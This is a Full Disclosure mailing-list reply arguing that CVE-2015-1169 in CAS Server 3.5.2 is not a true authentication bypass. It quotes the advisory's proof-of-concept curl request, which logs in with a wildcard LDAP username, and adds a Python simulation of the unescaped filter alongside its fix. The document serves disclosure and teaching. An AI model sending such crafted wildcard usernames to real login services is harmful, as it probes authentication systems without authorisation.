Message-ID: <20150129014835.GD4951@bender.unx.csupomona.edu>
Date: Wed, 28 Jan 2015 17:48:35 -0800
From: "Paul B. Henson" <henson@....org>
To: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers
 to bypass LDAP authentication via crafted wildcards.

This CVE claims CAS has a vulnerability that "allows remote attackers to
bypass LDAP authentication via crafted wildcards". My understanding of
an "authentication bypass" vulnerability is one that actually bypasses
authentication, accessing a resource without having to authenticate, as
enumerated at http://cwe.mitre.org/data/definitions/592.html

The actual vulnerability here is that if you are using the LDAP
authenticator that does a search for the supplied username and then
authenticates against the DN returned (as opposed to the LDAP
authenticator that directly constructs a bind DN from the username), it
does not properly escape wildcards in the supplied username when it does
the search, allowing you to authenticate with a username consisting of a
wildcard that matches the username *AND* the valid password for that
username. In addition, the supplied wildcard must match one and only one
entry in the ldap directory, as authentication will fail otherwise.

I don't think this is in any way an authentication bypass.
Authentication is being performed with an (almost valid) username and a
valid password, and while the issue does allow you to use a username
that's not an exact match, it still requires you to know the correct
password for that username and for the "not exact" match to be so
specific as to only match one user.

On Wed, Jan 21, 2015 at 12:49:38PM -0200, J. Tozo wrote:
> =====[Alligator Security Team - Security Advisory]========
> 
>   CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP
> authentication via crafted wildcards.
> 
>   Reporter: José Tozo  < juniorbsd () gmail com >
> 
> =====[Table of Contents]==================================
> 
> 1. Background
> 2. Detailed description
> 3. Other contexts & solutions
> 4. Timeline
> 5. References
> 
> =====[1. Background]======================================
> 
>  CAS is an authentication system originally created by Yale University to
> provide a trusted way for an application to authenticate a user.
> 
> =====[2. Detailed description]============================
> 
> A valid username and password are required.
> 
> Given a username johndoe and a password superpass, you can successfully
> achieve login using wildcards:
> 
> username: jo*
> password: superpass
> 
> The login will be successful only if the ldap bind search returns one
> unique member.
> 
> The vulnerability described in this document can be validated using the
> following example:
> 
> Client Request:
> root@...hine:/# curl -k -L -d "username=jo%2A&password=superpass"
> https://login.cas-server.com/v1/tickets
> 
> (note that * was url encoded to %2A)
> 
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> <html>
>    <head>
>       <title>201 The request has been fulfilled and resulted in a new
> resource being created</title>
>    </head>
>    <body>
>       <h1>TGT Created</h1>
>       <form action="
> https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz"
> method="POST">Service:<input type="text" name="service" value=""><br><input
> type="submit" value="Submit"></form>
>    </body>
> </html>
> 
> Server log:
> =============================================================
> WHO: [username: jo*]
> WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
> ACTION: TICKET_GRANTING_TICKET_CREATED
> APPLICATION: CAS
> WHEN: Tue Jan 20 18:38:17 BRST 2015
> CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
> SERVER IP ADDRESS: xxx.xxx.xxx.xxx
> =============================================================
> 
> =====[3. Other contexts & solutions]======================
> 
>  In order to apply the patch, you have to update at least to version 3.5.3.
> Newer versions, such as CAS 4.0.0 and above, are not vulnerable.
> 
> =====[4. Timeline]========================================
> 
> 29/12/14 Vendor notification.
> 14/01/15 Vendor rolled out new version 3.5.3
> 17/01/15 Mitre assigned CVE-2015-1169.
> 21/01/15 Disclosure date.
> 
> =====[5. References]=======================================
> 
> 1 - https://github.com/Jasig/cas/pull/411
> 2 -
> https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c
> 
> -- 
> Grato,
> 
>  Tozo

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
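The following is an added example, not code from CAS, from the advisory or from either poster. It simulates the search-then-bind authenticator that Paul describes and the jo*/superpass case from the advisory: a toy in-memory directory (constructed sample data), a minimal evaluator for "(uid=<value>)" filters in which an unescaped "*" is a wildcard, and an RFC 4515 escaping function of the kind the fix applies to the supplied username before building the search filter. The directory entries, DNs and passwords are all made up for the example.

```python
"""Added example (not CAS code): how an unescaped LDAP search filter lets a
wildcard username such as 'jo*' resolve to a real account, and how RFC 4515
escaping of the assertion value closes it.  Directory and filter evaluator
are a constructed simulation so the example runs offline."""
import re

# Constructed sample directory: uid -> (dn, password).  Not real data.
DIRECTORY = {
    "johndoe": ("uid=johndoe,ou=people,dc=example,dc=com", "superpass"),
    "janedoe": ("uid=janedoe,ou=people,dc=example,dc=com", "otherpass"),
    "bob":     ("uid=bob,ou=people,dc=example,dc=com", "bobpass"),
}


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping of an assertion value: '*', '(', ')', '\\' and NUL
    become backslash plus two hex digits, so the filter matches them literally."""
    out = []
    for ch in value:
        if ch in '*()\\\x00':
            out.append('\\%02x' % ord(ch))
        else:
            out.append(ch)
    return ''.join(out)


def assertion_to_regex(assertion: str) -> "re.Pattern":
    """Turn the value side of an LDAP equality/substring filter into a regex.
    An unescaped '*' matches any run of characters; '\\XX' is one literal char.
    Matching is case-sensitive here to keep the simulation simple."""
    parts = []
    i = 0
    while i < len(assertion):
        ch = assertion[i]
        if ch == '\\' and i + 2 < len(assertion):
            parts.append(re.escape(chr(int(assertion[i + 1:i + 3], 16))))
            i += 3
        elif ch == '*':
            parts.append('.*')
            i += 1
        else:
            parts.append(re.escape(ch))
            i += 1
    return re.compile('^' + ''.join(parts) + '$')


def search_uid(assertion: str) -> list:
    """Simulated '(uid=<assertion>)' search; returns the DNs that match."""
    pattern = assertion_to_regex(assertion)
    return [dn for uid, (dn, _) in DIRECTORY.items() if pattern.match(uid)]


def bind(dn: str, password: str) -> bool:
    """Simulated simple bind against the DN the search returned."""
    for stored_dn, stored_pw in DIRECTORY.values():
        if stored_dn == dn:
            return stored_pw == password
    return False


def search_then_bind(username: str, password: str, escape: bool) -> bool:
    """Search-then-bind authenticator.  escape=False interpolates the raw
    username into the filter (the behaviour the advisory describes);
    escape=True escapes it first (the behaviour of the fix)."""
    assertion = escape_filter_value(username) if escape else username
    matches = search_uid(assertion)
    if len(matches) != 1:   # zero or ambiguous matches: authentication fails
        return False
    return bind(matches[0], password)


if __name__ == "__main__":
    print(escape_filter_value("jo*"))                             # jo\2a
    print(search_then_bind("jo*", "superpass", escape=False))     # True: one match + right password
    print(search_then_bind("j*", "superpass", escape=False))      # False: two entries match
    print(search_then_bind("jo*", "wrongpass", escape=False))     # False: password still checked
    print(search_then_bind("jo*", "superpass", escape=True))      # False: literal 'jo*' not found
    print(search_then_bind("johndoe", "superpass", escape=True))  # True: normal login unaffected
```

The run shows both halves of Paul's point: with the unescaped filter, "jo*" plus the right password logs in as johndoe, but "j*" fails because it matches two entries and a wrong password fails regardless; with escaping, only the exact uid matches, and normal logins are unchanged.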
